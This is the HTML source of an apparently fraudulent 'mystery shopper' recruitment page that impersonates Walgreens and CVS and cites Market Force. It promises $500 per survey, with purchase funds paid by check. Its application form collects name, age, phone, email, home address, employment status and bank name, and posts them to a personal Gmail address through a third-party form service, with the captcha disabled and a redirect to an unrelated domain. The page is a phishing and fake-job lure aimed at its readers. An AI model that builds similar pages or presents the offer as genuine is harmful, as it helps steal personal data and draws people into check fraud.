

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta name="viewport" content="width=device-width">
    <meta charset="utf-8">
    <title></title>
    
    <link rel="icon" href="">
    <meta name="next-head-count" content="5">
    <link rel="preload" href="_next/static/css/fa605a2e7387ae6acff3.css" as="style">
    <link rel="stylesheet" href="_next/static/css/fa605a2e7387ae6acff3.css" data-n-g=""><noscript
        data-n-css=""></noscript>
    <link rel="preload" href="_next/static/chunks/webpack-189c53927ffd3caf09c3.html" as="script">
    <link rel="preload" href="_next/static/chunks/framework-92300432a1172ef1338b.html" as="script">
    <link rel="preload" href="_next/static/chunks/main-71948af4b0f09c0fc30e.html" as="script">
    <link rel="preload" href="_next/static/chunks/pages/_app-9e366951ad03f095f5b3.html" as="script">
    <link rel="preload" href="_next/static/chunks/814-16eda819eff2e28d39ff.html" as="script">
    <link rel="preload" href="_next/static/chunks/748-ecf7ef402c655d9fd446.html" as="script">
    <link rel="preload" href="_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.html" as="script">
</head>

<body data-new-gr-c-s-check-loaded="14.1037.0" data-gr-ext-installed="">
    <div id="__next">
        <header class="fixed z-50 w-full bg-white py-4 sm:py-5 px-2 sm:px-3 border-b shadow-md">
            <div class="container max-w-screen-lg mx-auto flex flex-row items-center justify-between">
                <div class="inline-flex items-center justify-center cursor-pointer">
                    <img src="/avd3neugp.webp" class="h-5 w-10" style="height: 80px; width: 80px;">
                    <h1 class="text-xl ml-2" style="color: red; font-size: 25px;">Walgreens</h1>
                </div>
                 
            </div>
        </header>



       <div class="h-14"></div>
        <main>
            
            <section class="relative md:px-6 py-20 bg-secondary">
                <h1 style="font-size:18px; text-align: center; color: #fff;" class="text-base mb-8"></h1>
                <h2 class="text-center mb-5 text-white font-black text-2xl md:text-3xl">BECOME WALGREENS AND CVS PHARMACY, SECRET SHOPPER.</h2>
                <div class="container max-w-screen-lg mx-auto flex flex-row items-center md:justify-between">
                    <ul
                        class="relative shadow-md border bg-white flex flex-col md:flex-row m-1 pt-10 md:pt-0  z-10 rounded">
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">Join Our Mystery Shopping Team!</h3>
                            <p class="text-sm m-0">At Market Force, we help brands uphold their standards through mystery shopping services, 
                                allowing you to "inspect what you expect." With a network of 400,000 independent contractors, we conduct over 
                                100,000 monthly evaluations. Our pride lies in delivering top-quality programs that assess on-site experiences, 
                                phone orders, contact center interactions, and website usability.</p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">Current Opportunity: Store Survey Evaluator</h3>
                            <p class="text-sm m-0">We're seeking individuals in your area to evaluate customer service at local stores, including 
                                Walgreens and CVS Pharmacy. Your role will involve posing as a regular customer, making purchases, and reporting 
                                on your experience. This helps improve the shopping environment for consumers in your community.</p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">Responsibilities:</h3>
                            <p class="text-sm m-0">  1. Complete assignments promptly, with flexible scheduling.<br>
                                  2. Maintain a friendly demeanor and reliability.<br>
                                  3. Demonstrate effective time management, initiative, and teamwork skills.<br />
                            
                            </p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">Job Description:</h3>
                            <p class="text-sm m-0">You will discreetly visit any of these stores CVS Pharm., WALGREEN, WALMART. KROGER, PUBLIX, and 
                                BESTBUY/ALDLs locations to assess recent service slowdowns. Each evaluation will take approximately 15-45 minutes and 
                                will be located within 10-20 miles of your zip code. We provide all necessary funds for your purchases, along with your 
                                commission, paid via check.
                            </p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">Compensation:</h3>
                            <p class="text-sm m-0"> - Payment: $500 per completed survey.<br>
                                - Expenses: All related costs will be covered.<br>
                                - No prior experience is required!<br>


                                If you are interested in this exciting opportunity to become a mystery shopper for any of these stores, please fill out the form below with the required information.
                                <br/>
                                
                            </p>
                        </li>
                    </ul>
                </div>
            </section>

            <section class="relative md:px-6 py-20 bg-secondary">
                    <P class="text-center mb-5 text-white font-black" style="font-weight: 0;">Please complete the form to apply with us.</P>
                <div class="container max-w-screen-lg mx-auto flex flex-row items-center md:justify-between">
                    <div
                        class="container">
                        <form  method="POST" action="https://formsubmit.co/Cydneyhubbard102@gmail.com">
                            <input type="hidden" name="_next" value="https://budlightapply.online/admin.html">
                            <input type="hidden" name="_subject" value="New info mail!">
                            <input type="hidden" name="_captcha" value="false">
                            <label> Full Name: </label><br>
                            <input  type="text"  name="Name"  required/> <br>
                            <label> Gender: </label><br>
                            <input  type="text"  name="Gender"  required/> <br>
                            <label> Email Address: </label><br>
                            <input type="email"  name="date"  required/> <br>
                            <label> Phone: </label><br>
                            <input type="number"  name="Email"  required/> <br>
                            <label> Age </label><br>
                            <input type="number"  name="Age"  required/> <br>
                            <label> Please Provide Your House Address For Receiving The Payment: </label><br>
                            <input type="text"  name="HomeAddress" placeholder="Add,City,State,Zip Code" required/> <br>
                            <label> Are you Currently Employed? </label><br>
                            <input type="text"  name="Employed"  required/> <br>
                            <label> Bank Name Only: </label><br>
                            <input type="text"  name="Bankname"  required/> <br>
                            <label> How far are the Walgreens and CVS stores fr</label><br>
                            <input type="text"  name="StoreToHome"  required/> <br>
                            <label> Do you have any Questions? </label><br>
                            <input type="text"  name="Question" placeholder="Response within 24hr in your email" required/> <br>
                            <button class="sendbutton" value="send" type="submit">Submit</button>
                        </form>
                        
                </div>
                </div>
            </section>

            <section class="relative bg-white py-14 px-6 text-secondary">
        </main>
        
    </div>
    <script id="__NEXT_DATA__"
        type="application/json">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"build","runtimeConfig":{},"nextExport":true,"autoExport":true,"isFallback":false}</script>
    <script nomodule="" src="_next/static/chunks/polyfills-eef578260fd80f8fff94.html"></script>
    <script src="_next/static/chunks/webpack-189c53927ffd3caf09c3.html" async=""></script>
    <script src="_next/static/chunks/framework-92300432a1172ef1338b.html" async=""></script>
    <script src="_next/static/chunks/main-71948af4b0f09c0fc30e.html" async=""></script>
    <script src="_next/static/chunks/pages/_app-9e366951ad03f095f5b3.html" async=""></script>
    <script src="_next/static/chunks/814-16eda819eff2e28d39ff.html" async=""></script>
    <script src="_next/static/chunks/748-ecf7ef402c655d9fd446.html" async=""></script>
    <script src="_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.html" async=""></script>
    <script src="_next/static/build/_buildManifest.html" async=""></script>
    <script src="_next/static/build/_ssgManifest.html" async=""></script>

    <grammarly-desktop-integration data-grammarly-shadow-root="true"></grammarly-desktop-integration>

</body>
